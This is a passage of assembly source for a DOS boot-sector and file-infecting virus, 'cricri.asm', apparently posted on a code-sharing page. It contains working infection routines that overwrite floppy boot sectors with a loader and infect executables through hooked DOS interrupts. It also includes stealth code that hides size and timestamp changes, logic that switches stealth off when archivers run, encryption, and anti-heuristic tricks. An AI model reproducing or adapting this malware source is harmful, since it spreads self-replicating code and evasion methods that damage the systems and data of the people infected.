📄 cricri.asm
字号:
;Get heads parameter
mov cx,word ptr es:[bx+1Ah]
push cx
;Divide tracks by heads
div cx
push ax
xchg ah,al
mov cl,06h
shl al,cl
or al,01h
;Save virus body position in floopy
mov word ptr cs:[load_cx],ax
pop ax
pop cx
xor dx,dx
div cx
mov byte ptr cs:[load_dh],dl
;Use floppy root directory for old boot sector
mov cx,000Eh
mov dx,0100h
;Write original boot sector
mov ax,0301h
pushf
call dword ptr cs:[old13h]
jc exit13h_inf
ok_original:
;Move virus loader into boot sector
push cs
pop ds
mov si,offset boot_code
mov cx,boot_size
cld
rep movsb
write_boot:
;Reset disk controler
xor ax,ax
pushf
call dword ptr cs:[old13h] ;************old13h]
;Write loader
mov ax,0301h
xor dx,dx
mov cx,0001h
pushf
call dword ptr cs:[old13h] ;+++++++++++old13h]
jnc ok_loader
exit13h_inf:
call pop_all
stc
cmc
retf 2
ok_loader:
;Set boot flag
mov byte ptr cs:[prog_type],"B"
;Perform encryption
call do_encrypt
push cs
pop es
;Write virus body
mov cx,word ptr cs:[load_cx]
mov dh,byte ptr cs:[load_dh]
mov bx,offset virus_copy
mov ax,0300h+sector_size
pushf
call dword ptr cs:[old13h] ;+++++++++++++old13h]
;Hide changes made to boot sector
stealth_boot:
call pop_all
mov cl,03h
mov al,01h
mov cl,0Eh
mov dh,01h
jmp dword ptr cs:[old13h]
;----------------------------------------------------------------------------
;Code inserted into boot sector
;----------------------------------------------------------------------------
boot_code:
cli
xor ax,ax
mov ss,ax
mov es,ax
mov ds,ax
mov si,7C00h
mov sp,si
sti
;Allocate some BIOS memory
sub word ptr ds:[0413h],(lenvir/512)+1
mov ax,word ptr ds:[0413h]
;Calculate residence address
mov cl,06h
shl ax,cl
mov es,ax
;Reset disk
xor ax,ax
int 13h
;Get position in disk
;mov cx,XXXXh
db 0B9h
load_cx dw 0000h
;mov dh,XXh
db 0B6h
load_dh db 00h
;Prepare for reading virus body
try_again:
mov ax,0200h+sector_size
;Read at es:bx
xor bx,bx
;Read virus body into allocated memory
int 13h
jc error_init
;Continue execution on virus body
push es
push bx
retf
;Error during virus initialization
error_init:
int 18h
;----------------------------------------------------------------------------
;Infection marker
;----------------------------------------------------------------------------
boot_marker db "CR"
;End of boot code
boot_end:
;----------------------------------------------------------------------------
;Virus int 21h
;----------------------------------------------------------------------------
my_int21h:
call push_all
;Set int 21h running switch
mov byte ptr cs:[running_sw],"F"
;Anti-heuristic function number examination
xor ax,0FFFFh
mov word ptr cs:[dos_function],ax
;Save old int 24h
mov al,24h
call get_int
mov word ptr cs:[old24h_seg],es
mov word ptr cs:[old24h_off],bx
;Hook int 24h to a do-nothing handler
push cs
pop ds
mov dx,offset my_int24h
mov al,24h
call set_int
;Save old int 03h
mov al,03h
call get_int
mov word ptr cs:[old03h_seg],es
mov word ptr cs:[old03h_off],bx
;Hook int 03h to original int 21h
lds dx,dword ptr cs:[old21h]
mov al,03h
call set_int
;Check for special files
mov ah,51h ;62h?
int 03h
dec bx
mov ds,bx
mov ax,word ptr ds:[0008h]
mov byte ptr cs:[stealth_sw],00h
;Check if arj is running
cmp ax,"RA"
je disable_stealth
;Check for pkzip utils
cmp ax,"KP"
je disable_stealth
;Check for lha
cmp ax,"HL"
je disable_stealth
;Check for backup
cmp ax,"AB"
je disable_stealth
jmp no_running
disable_stealth:
mov byte ptr cs:[stealth_sw],0FFh
no_running:
;Restore and re-save all regs
call pop_all
call push_all
;Put function number into bx
mov bx,word ptr cs:[dos_function]
;----------------------------------------------------------------------------
;Infection functions
;----------------------------------------------------------------------------
infection_00:
;Exec function
cmp bx,(4B00h xor 0FFFFh)
jne infection_01
jmp dos_exec
infection_01:
;Close file (Handle)
cmp bh,(3Eh xor 0FFh)
jne stealth_dos
jmp dos_close
;----------------------------------------------------------------------------
;Stealth functions
;----------------------------------------------------------------------------
stealth_dos:
;Check if stealth is disabled
cmp byte ptr cs:[stealth_sw],0FFh
je m21h_exit
;Open file (Handle)
cmp bh,(3Dh xor 0FFh)
jne stealth_00
jmp dos_open
stealth_00:
;Extended open
cmp bh,(6Ch xor 0FFh)
jne stealth_01
jmp dos_open
stealth_01:
;Directory stealth works with function Findfirst (fcb)
cmp bh,(11h xor 0FFh)
jne stealth_02
jmp ff_fcb
stealth_02:
;Directory stealth works also with function Findnext(fcb)
cmp bh,(12h xor 0FFh)
jne stealth_03
jmp ff_fcb
stealth_03:
;Search stealth works with Findfirst (handle)
cmp bh,(4Eh xor 0FFh)
jne stealth_04
jmp ff_handle
stealth_04:
;Search stealth works also with Findnext (handle)
cmp bh,(4Fh xor 0FFh)
jne stealth_05
jmp ff_handle
stealth_05:
;Read stealth
cmp bh,(3Fh xor 0FFh)
jne stealth_06
jmp dos_read
stealth_06:
;Disinfect if debuggers exec
cmp bx,(4B01h xor 0FFFFh)
jne stealth_07
jmp dos_load_exec
stealth_07:
;Disinfect if file write
cmp bh,(40h xor 0FFh)
jne stealth_08
jmp dos_write
stealth_08:
;Get file date/time
cmp bx,(5700h xor 0FFFFh)
jne stealth_09
jmp dos_get_time
stealth_09:
;Set file date/time
cmp bx,(5701h xor 0FFFFh)
jne m21h_exit
jmp dos_set_time
;Get control back to dos
m21h_exit:
;Free int 03h and int 24h
call unhook_ints
call pop_all
jmp dword ptr cs:[old21h]
;----------------------------------------------------------------------------
;Directory stealth with functions 11h and 12h (fcb)
;----------------------------------------------------------------------------
ff_fcb:
call pop_all
;Call DOS service
int 03h
;Save all regs
call push_all
;Check for errors
cmp al,255
je nofound_fcb
;Get current PSP
mov ah,51h
int 03h
;Check if call comes from DOS
mov es,bx
cmp bx,es:[16h]
jne nofound_fcb
mov bx,dx
mov al,ds:[bx+00h]
push ax
;Get DTA
mov ah,2Fh
int 03h
pop ax
inc al
jnz fcb_ok
add bx,07h
fcb_ok:
;Check if infected
mov ax,word ptr es:[bx+17h]
and al,1Fh
cmp al,1Fh
jne nofound_fcb
;Restore seconds
and byte ptr es:[bx+17h],0E0h
;Restore original file size
sub word ptr es:[bx+1Dh],lenvir
sbb word ptr es:[bx+1Fh],0000h
nofound_fcb:
;Restore some registers and return
call unhook_ints
call pop_all
iret
;----------------------------------------------------------------------------
;Search stealth with functions 4Eh and 4Fh (handle)
;----------------------------------------------------------------------------
ff_handle:
call pop_all
;Call DOS service
int 03h
jnc ffhok
call unhook_ints
stc
retf 2
ffhok:
;Save result
call push_all
;Get DTA
mov ah,2Fh
int 03h
;Check if infected
mov ax,word ptr es:[bx+16h]
and al,1Fh
cmp al,1Fh
jne nofound_handle
;Restore seconds field
and byte ptr es:[bx+16h],0E0h
;Restore original size
sub word ptr es:[bx+1Ah],lenvir
sbb word ptr es:[bx+1Ch],0000h
nofound_handle:
;Restore some registers and exit
call unhook_ints
call pop_all
stc
cmc
retf 2
;----------------------------------------------------------------------------
;Load exec
;----------------------------------------------------------------------------
dos_load_exec:
;Open file for read-only
mov ax,3D00h
int 03h
jnc loaded
jmp m21h_exit
loaded:
xchg bx,ax
jmp do_disinfect
;----------------------------------------------------------------------------
;Write file
;----------------------------------------------------------------------------
dos_write:
call pop_all
call push_all
do_disinfect:
;Get sft address in es:di
call get_sft
jc bad_operation
;Check if file is already infected
mov al,byte ptr es:[di+0Dh]
mov ah,1Fh
and al,ah
cmp al,ah
je clear_header
bad_operation:
jmp load_error
clear_header:
;Save and set file open mode (read/write)
mov cx,0002h
xchg cx,word ptr es:[di+02h]
push cx
;Save and set file attribute
xor al,al
xchg al,byte ptr es:[di+04h]
push ax
;Save and set file pointer position
push word ptr es:[di+15h]
push word ptr es:[di+17h]
;Get file true size if write operation
cmp byte ptr cs:[dos_function+01h],(40h xor 0FFh)
jne no_size_fix
;Add virus size to file size
add word ptr es:[di+11h],lenvir
adc word ptr es:[di+13h],0000h
no_size_fix:
;Point to old header in file
call seek_end
sub word ptr es:[di+15h],0019h+01h
sbb word ptr es:[di+17h],0000h
;Read old header and encryption key
push cs
pop ds
mov ah,3Fh
mov cx,0019h+01h
mov dx,offset virus_copy
int 03h
jc exit_disin
;Decrypt header
mov cx,0019h
push dx
pop si
mov al,byte ptr cs:[si+19h]
restore_header:
xor byte ptr cs:[si+00h],al
inc si
loop restore_header
;Write old header
call seek_begin
mov dx,offset virus_copy
mov ah,40h
mov cx,0019h-01h
int 03h
;Truncate file
call seek_end
sub word ptr es:[di+15h],lenvir
sbb word ptr es:[di+17h],0000h
xor cx,cx
mov ah,40h
int 03h
exit_disin:
;Restore file pointer position
pop word ptr es:[di+17h]
pop word ptr es:[di+15h]
;Restore file attribute
pop ax
mov byte ptr es:[di+04h],al
;Restore file open mode
pop word ptr es:[di+02h]
;Do not set file date and file time on closing
or byte ptr es:[di+06h],40h
;Clear seconds field
and byte ptr es:[di+0Dh],0E0h
load_error:
;Check if write function
cmp byte ptr cs:[dos_function+01h],(40h xor 0FFh)
je not_load
;Close file
mov ah,3Eh
int 03h
not_load:
jmp m21h_exit
;----------------------------------------------------------------------------
;Get file date/time
;----------------------------------------------------------------------------
dos_get_time:
call pop_all
;Call function
int 03h
jnc ok_get_time
;Exit if error
call unhook_ints
stc
retf 2
ok_get_time:
call push_all
;Check if file is already infected
mov al,cl
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -